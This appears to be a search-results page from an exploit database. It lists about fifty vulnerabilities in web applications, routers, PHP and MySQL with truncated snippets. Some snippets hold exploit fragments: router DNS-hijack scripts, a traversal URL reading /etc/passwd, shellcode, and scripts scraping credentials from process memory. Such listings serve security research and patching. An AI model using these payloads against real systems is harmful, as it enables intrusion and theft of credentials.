56796 matches found
Joomla jVoteSystem 2.56 Component parameter keyword XSS vulnerability
0x01 vulnerability profile Joomla jVoteSystem 2.56 Component parameters keyword the presence of a reflective XSS vulnerability. 0x02 vulnerability analysis http://www.9u4u.be/index.php?option=comjvotesystem&view=polls&cat=cw&keyword=1&Itemid=12jvotesystem Construct the following payload: 1"...
Tenda ADSL2/2+ Modem 963281TAN - not authorized to modify the DNS
No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " Tenda ADSL2/2+ Modem 963281TAN " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...
PLANET VDR-300NU ADSL Router - not authorized to modify the DNS
No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " PLANET VDR-300NU ADSL ROUTER " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...
PHPCMS V9 version of the background design flaws lead to arbitrary code execution vulnerability
Source link: http://www.cnbraid.com/ 0x01 background Since the default after installation requires Super administrator privileges, so the vulnerability is very tasteless, but the feeling should be in other cms, there are also, so the main share under the mining idea PS: using the test environment...
VideoIQ Camera local file inclusion vulnerability
No description provided by source...
PHPIPAM v1.1.010 Multiple Vulnerabilities
No description provided by source...
PHP 'bcmath.c' Multiple Local Heap Overflow Vulnerabilities
No description provided by source...
Web Idea Pakistan product.php parameter pID SQL Injection
No description provided by source...
Strongsoft AjaxDeleteMsgInfo. ashx parameters msgid a SQL injection vulnerability
No description provided by source...
Atlassian Confluence arbitrary file include Vulnerability (CVE-2015-8399)
Affect the Assembly: Atlassian Confluence Atlassian Confluence is less than 5. 8. 17 versions of the service exist in the arbitrary file read and directory traversal vulnerabilities /spaces/viewdefaultdecorator. action? decoratorName=. Lists the current directory /spaces/viewdefaultdecorator...
LamaHub 0.0.62 remote code execution vulnerability
No description provided by source. import socket HOST = 'localhost' PORT = 4111 s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectHOST, PORT buf = "" buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73" buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63" buf +=...
Strongsoft FloodDisastersQueryContent. aspx parameters DirTypeDetailId SQL injection vulnerability
No description provided by source...
WordPress RB Agency Plugin 2.4.7 - local file inclusion
漏洞出现在/ext/forcedownload.php http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd...
PHP 5.0.0 - 'fbird_[p]connect()' local denial of service
No description provided by source...
MySQL <= 5.7.15 remote Root code execution vulnerability
http://legalhackers.com - dawid at legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL = 5.7.15 Remote Root Code Execution / Privilege Escalation 0day 5.6.33 5.5.52 MySQL clones are also affected, including: MariaDB PerconaDB II. BACKGROUND...
PHP 5.0.0 - 'snmpwalkoid()' local denial of service
No description provided by source...
Navicat Premium 11.2.11 (64bit) Local Password Disclosure
No description provided by source...
SugarCRM v6. 5. 23 PHP deserialize an object injection vulnerability
Author: p0wd3r know Chong Yu 404 security lab Date: 2016-09-12 0x00 vulnerability overview 1. Vulnerability description SugarCRM(http://www.sugarcrm.com/ is a set of open source Customer Relationship Management System. Recent researchers found in its=6.5.23 version exists in the deserialization...
UF FE /sysform/003/editflow_manager. jsp parameters of the UID injection vulnerability
No description provided by source...
MySQL 5.5.45 (64bit) - local credential information disclosure
No description provided by source. mport time from winappdbg import Debug, Process def b2hstr: return ''.join"%02X " % ordx for x in str.strip def h2bstr: bytes = str = ''.joinstr.split" " for i in range0, lenstr, 2: bytes.appendchrintstri:i+2, 16 return ''.joinbytes usr = '' pwd = '' count = 0...
泛微 OA /js/swfupload/swfupload.swf xss漏洞
No description provided by source...
UF A6 /yyoa/assess/js/initDataAssess. jsp information disclosure
No description provided by source...
Adobe ColdFusion < 11 Update 10 - XML external entity injection
Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - APSB16-30 - Release date: 31.08.2016 I. VULNERABILITY Adobe ColdFusion = 11 XML External Entity XXE Injection II. BACKGROUND "Adobe ColdFusion 11 Enterprise Edition offers a single platform to rapidly build and...
UF FE /flex/newsmessage. jsp parameter uname injection vulnerability
No description provided by source...
ZKTeco ZKAccess Security System 5.3.1 - stored XSS
Application description ZKAccess systems are built on flexible, open technology to provide management, real-time monitoring and control of your access control changes, access via a browser,without the need to install additional software. Security infrastructure devices centralized management,...
Joomla Extra Search v2.2.8 SQL Injection
No description provided by source...
UF FE /feform/createprinttemplete. jsp parameters formid injection vulnerability
No description provided by source...
Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)
No description provided by source. import socket, sys , base64, struct, string, urllib from getopt import getopt as GetOpt, GetoptError from uuid import getnode as getmac import SimpleHTTPServer, SocketServer TIMELINE ''' 3/16/2016 - First Submission to Belkin no response 5/3/2016 - Second...
Forticlient ™ end-SSLVPN 5.4 - credentials information disclosure
No description provided by source. from winappdbg import Debug, Process, HexDump import sys filename = "FortiTray.exe" 程序名 searchstring = "fortissl" 当用户凭证存储在进程内存中,模仿偏移 查询用户凭证函数 def memorysearch pid, strings : process = Process pid memdump =...
ZKTeco ZKBioSecurity 3.0 hard-coded login credentials and remote system command execution
No description provided by source...
UF FE /admin/systemXml/system-bean. xml information disclosure vulnerability
No description provided by source...
WordPress CYSTEME Finder plugin arbitrary file disclosure+upload vulnerability
No description provided by source...
Wordpress timthumb-config. php arbitrary File Download
No description provided by source...
UF FE office platform /security/role_add_user. jsp parameters searchValue SQL injection vulnerability
No description provided by source...
Joomla com_offices parameter file SQL blind injection vulnerability
No description provided by source...
Joomla com_jsjobs parameters oi SQL injection vulnerability
No description provided by source...
UF FE /feReport/chartList. jsp parameter reportId injection vulnerability
No description provided by source...
NScan 0.91 local code execution vulnerability
No description provided by source. import struct rp=struct.pack"L", 0x75658BD5 JMP ESP kernel32 Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit sc="\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"...
ZKTeco ZKBioSecurity 3.0 - (visLogin. jsp) Local Authentication bypass
No description provided by source...
ENOMSOFT product.php parameter id SQL Injection
No description provided by source...
PHP 5.0.0 - imap_mail() local denial of service
No description provided by source...
qBit /pages/getPage parameter p SQL Injection
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import random import hashlib class TestPOCPOCBase: vulID = '1' ssvid version = '1.0' author =...
ESPCMS File Download information disclosure vulnerability
No description provided by source...
Simpla Admin v1.02 single-ads.php parameter ID SQL Injection
No description provided by source...
erduo music \source\user\blog\ajax.php the variable content stored XSS
No description provided by source...
HelpDeskZ 1.0.2 unauthorized Shell upload
No description provided by source. ''' Exploit Title: HelpDeskZ /submitticketcontroller.php - Line 141 $filename = md5$FILES'attachment''name'.time.".".$ext; So by guessing the time the file was uploaded, we can get RCE. Steps to reproduce:...
WordPress Catpro Gallery plugin arbitrary file upload vulnerability
No description provided by source...
WordPress Vertical Gallery plugin arbitrary file upload vulnerability
No description provided by source...
cmseasy /imageUp.php xss vulnerability
No description provided by source...
Vanderbilt IP-Camera CCPW3025-IR, CVMW3025-IR readfile. cgi information disclosure vulnerability
No description provided by source...